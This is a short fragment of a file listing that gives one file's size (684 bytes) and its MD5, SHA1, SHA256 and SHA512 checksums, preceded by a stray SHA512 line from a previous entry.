  SHA512: 1f22f5d5b2fb14eae92ca01da4b3179231633dedcd55d5f80781d75c5e93a02eeabb58e5ea9898de8d0015c5fd199968fc6f4a0a9796a94be51efeb82ba60cc1

- Filesize: 684B
  MD5: c1eb6c3842d7b14403e0476900449691
  SHA1: 1c9d58f40cbd3781ea5b26896291a8c2def15bf6
  SHA256: 90083a432f001c99421481e55f9d37494163c11fa5b6ac39c7150a35603daced
  SHA512: 493f6b14da897d3c2930b0065e658f404208a43c7aae9aafac06a978fa3107367e458733835d0e509a5e8c3a16f6570cbe3476bd444aa39199e06a8fd6cd75e3